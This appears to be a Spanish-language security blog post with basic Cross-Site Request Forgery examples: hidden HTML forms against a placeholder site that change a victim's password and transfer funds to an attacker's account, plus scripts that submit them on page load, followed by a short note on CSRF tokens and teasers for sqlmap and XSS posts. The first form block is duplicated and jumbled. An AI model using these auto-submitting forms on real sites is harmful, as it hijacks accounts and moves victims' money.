Ir al contenido principal

🥇▷ ataques web de Cross-Site Request Forgery (CSRF).

A continuación, te proporciono algunos ejemplos básicos de ataques de Cross-Site Request Forgery (CSRF). Recuerda que estos ejemplos deben utilizarse solo en entornos controlados y con el permiso del propietario del sitio web. Realizar CSRF sin permiso es ilegal y puede tener consecuencias legales graves.

  1. Cambio de contraseña:

Supongamos que un sitio web tiene una URL para cambiar la contraseña de un usuario:

 

 

<form action="http://www.example.com/change_password" method="POST"> <input name="new_password" type="hidden" value="newpassword123" /> <input type="submit" value="Cambiar contraseña" /> </form><form action="http://www.example.com/change_password" method="POST"> </form><form action="http://www.example.com/change_password" method="POST">Un atacante puede crear una página maliciosa que haga que un usuario legítimo la visite involuntariamente:</form><form action="http://www.example.com/change_password" method="POST"> </form><form action="http://www.example.com/change_password" method="POST"> <br /></form> 

Un atacante puede crear una página maliciosa que haga que un usuario legítimo la visite involuntariamente:

<script> // Envía la solicitud de cambio de contraseña automáticamente cuando se carga la página document.forms[0].submit(); </script> 

Si el usuario está autenticado en el sitio web y visita la página maliciosa (evil.html), el navegador enviará una solicitud para cambiar la contraseña del usuario sin su conocimiento o consentimiento. Transferencia de fondos: Supongamos que un sitio web permite transferir fondos entre cuentas con la siguiente URL: 

<form action="http://www.example.com/transfer_funds" method="POST"> <input type="hidden" name="to_account" value="attacker_account" /> <input type="hidden" name="amount" value="1000" /> <input type="submit" value="Transferir fondos" /> </form> 

El atacante puede crear una página maliciosa que haga que un usuario legítimo la visite involuntariamente:

<script> // Envía la solicitud de transferencia de fondos automáticamente cuando se carga la página document.forms[0].submit(); </script> 

Si el usuario está autenticado en el sitio web y visita la página maliciosa (evil.html), el navegador enviará una solicitud para transferir fondos a la cuenta del atacante sin el conocimiento o consentimiento del usuario. Para protegerse contra ataques CSRF, los desarrolladores deben implementar tokens CSRF (tokens anti-falsificación) y validar las solicitudes entrantes para asegurarse de que provengan de fuentes legítimas y no de sitios maliciosos. Los navegadores modernos también admiten políticas de cabeceras CORS (Cross-Origin Resource Sharing) que pueden ayudar a mitigar estos ataques.

Entradas populares de este blog

🥇▷ Como hackear una base de datos con sqlmap

Como hackear una base de datos con sqlmap (sql injection) sqlmap --help Nos descargamos la pagina web vulnerable (DVWA) para practicar sobre diferentes ataques a nivel Web desde la siguiente url, y seguimos los pasos que nos indican para la instalacion web y su base de datos. https://github.com/digininja/DVWA/releases Una vez instalado nos vamos a burpsuite que esta en kali linux, aunque lo podemos encontrar para windows tambien. Le damos click. En esta ventana le damos Next (siguiente). En esta ventana le damos Start burp. Se nos abrira la ventana de burpsuite. Por cierto burpsuite sirve para escanear webs y encontrar vulnerabilidades de forma automatica (30 dias gratis) o de forma manual gratis, si ya hemos localizado la vulnerabilidad atraves de un proxy. Esta vez lo hacemos de forma manual. Nos vamos a la pestaña proxy. Activamos intercept is on. Y le damos a open browser. Ponemos la direccion Web de DVWA de nuestra web vulnerable. Le d

🥇▷ Vulnerabilidad xss en web gva.es generalitat valenciana

Vulnerabilidad xss reflected en web generalitat valenciana > gva.es El dia que encontremos 2 vulnerabilidades y la reportemos al organismo de la comunidad valenciana (españa) basada en la vulnerabilidad xss reflected. ¿Que es una vulnerabilidad xss reflected? Una secuencia de comandos en sitios cruzados o Cross-site scripting es un tipo de vulnerabilidad informática o agujero de seguridad típico de las aplicaciones Web, que puede permitir a una tercera persona inyectar en páginas web visitadas por el usuario código JavaScript o en otro lenguaje similar.

🥇▷ Libros de Seguridad Informatica

Libros de Seguridad Informatica https://0xword.com/